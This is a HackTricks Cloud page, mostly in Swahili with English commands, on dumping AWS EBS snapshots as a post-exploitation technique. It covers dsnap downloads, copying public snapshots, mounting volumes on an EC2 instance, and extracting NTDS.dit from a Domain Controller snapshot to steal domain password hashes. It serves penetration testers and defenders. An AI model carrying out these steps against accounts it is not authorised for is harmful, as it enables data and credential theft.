AWS - EBS Snapshot Dump

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Kuangalia snapshot kwa ndani

# Install dependencies
pip install 'dsnap[cli]'
brew install vagrant
brew install virtualbox

# Get snapshot from image
mkdir snap_wordir; cd snap_workdir
dsnap init
## Download a snapshot of the volume of that instance
## If no snapshot existed it will try to create one
dsnap get <instance-id>
dsnap --profile default --region eu-west-1 get i-0d706e33814c1ef9a
## Other way to get a snapshot
dsnap list #List snapshots
dsnap get snap-0dbb0347f47e38b96 #Download snapshot directly

# Run with vagrant
IMAGE="<download_file>.img" vagrant up #Run image with vagrant+virtuabox
IMAGE="<download_file>.img" vagrant ssh #Access the VM
vagrant destroy #To destoy

# Run with docker
git clone https://github.com/RhinoSecurityLabs/dsnap.git
cd dsnap
make docker/build
IMAGE="<download_file>.img" make docker/run #With the snapshot downloaded

Kumbuka kwamba dsnap haitakuruhusu kupakua snapshots za umma. Ili kuzunguka hili, unaweza kufanya nakala ya snapshot katika akaunti yako binafsi, na kupakua hiyo:

# Copy the snapshot
aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57"

# View the snapshot info
aws ec2 describe-snapshots --owner-ids self --region us-east-2

# Download the snapshot. The ID is the copy from your account
dsnap --region us-east-2 get snap-027da41be451109da

# Delete the snapshot after downloading
aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2

Kwa maelezo zaidi kuhusu mbinu hii angalia utafiti wa asili katika https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/

Unaweza kufanya hivi na Pacu ukitumia moduli ebs__download_snapshots

Kuangalia snapshot katika AWS

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id snap-0b49342abd1bdcb89

Iweke kwenye VM ya EC2 chini ya udhibiti wako (inapaswa kuwa katika eneo moja na nakala ya nakala ya akiba):

Hatua ya 1: Kiasi kipya cha ukubwa na aina unayopendelea kinapaswa kuundwa kwa kuelekea EC2 –> Volumes.

Ili uweze kufanya hatua hii, fuata amri hizi:

Unda kiasi cha EBS kuunganisha na mfano wa EC2.
Hakikisha kwamba kiasi cha EBS na mfano viko katika eneo moja.

Hatua ya 2: Chaguo la "unganishi kiasi" linapaswa kuchaguliwa kwa kubonyeza kulia kwenye kiasi kilichoundwa.

Hatua ya 3: Mfano kutoka kwenye kisanduku cha maandiko ya mfano unapaswa kuchaguliwa.

Ili uweze kufanya hatua hii, tumia amri ifuatayo:

Unganisha kiasi cha EBS.

Hatua ya 4: Ingia kwenye mfano wa EC2 na orodhesha diski zinazopatikana kwa kutumia amri lsblk.

Hatua ya 5: Angalia kama kiasi kina data yoyote kwa kutumia amri sudo file -s /dev/xvdf.

Ikiwa matokeo ya amri hapo juu yanaonyesha "/dev/xvdf: data", inamaanisha kwamba kiasi ni tupu.

Hatua ya 6: Fanya mfumo wa kiasi kuwa ext4 kwa kutumia amri sudo mkfs -t ext4 /dev/xvdf. Vinginevyo, unaweza pia kutumia muundo wa xfs kwa kutumia amri sudo mkfs -t xfs /dev/xvdf. Tafadhali kumbuka kwamba unapaswa kutumia ama ext4 au xfs.

Hatua ya 7: Unda saraka ya uchaguzi wako ili kuunganisha kiasi kipya cha ext4. Kwa mfano, unaweza kutumia jina "newvolume".

Ili uweze kufanya hatua hii, tumia amri sudo mkdir /newvolume.

Hatua ya 8: Unganisha kiasi kwenye saraka "newvolume" kwa kutumia amri sudo mount /dev/xvdf /newvolume/.

Hatua ya 9: Badilisha saraka hadi saraka "newvolume" na angalia nafasi ya diski ili kuthibitisha kuunganishwa kwa kiasi.

Ili uweze kufanya hatua hii, tumia amri zifuatazo:

Badilisha saraka hadi /newvolume.
Angalia nafasi ya diski kwa kutumia amri df -h .. Matokeo ya amri hii yanapaswa kuonyesha nafasi ya bure katika saraka "newvolume".

Unaweza kufanya hivi na Pacu kwa kutumia moduli ebs__explore_snapshots.

Kuangalia snapshot katika AWS (ukitumia cli)

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id <snap-0b49342abd1bdcb89>

# Attach new volume to instance
aws ec2 attach-volume --device /dev/sdh --instance-id <INSTANCE-ID> --volume-id <VOLUME-ID>

# mount the snapshot from within the VM

sudo file -s /dev/sdh
/dev/sdh: symbolic link to `xvdh'

sudo file -s /dev/xvdh
/dev/xvdh: x86 boot sector; partition 1: ID=0xee, starthead 0, startsector 1, 16777215 sectors, extended partition table (last)\011, code offset 0x63

lsblk /dev/xvdh
NAME     MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
xvdh     202:112  0    8G  0 disk
├─xvdh1  202:113  0  7.9G  0 part
├─xvdh14 202:126  0    4M  0 part
└─xvdh15 202:127  0  106M  0 part

sudo mount /dev/xvdh1 /mnt

ls /mnt

Shadow Copy

Mtu yeyote wa AWS mwenye ruhusa ya EC2:CreateSnapshot anaweza kuiba hash za watumiaji wote wa domain kwa kuunda snapshot ya Domain Controller na kuikamilisha kwenye mfano wanaodhibiti na kutoa faili ya NTDS.dit na SYSTEM registry hive kwa matumizi na mradi wa secretsdump wa Impacket.

Unaweza kutumia chombo hiki kuendesha shambulio: https://github.com/Static-Flow/CloudCopy au unaweza kutumia moja ya mbinu za awali baada ya kuunda snapshot.

References

https://devopscube.com/mount-ebs-volume-ec2-instance/

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - EC2, EBS, SSM & VPC Post Exploitation NextAWS - Malicious VPC Mirror

Last updated 3 days ago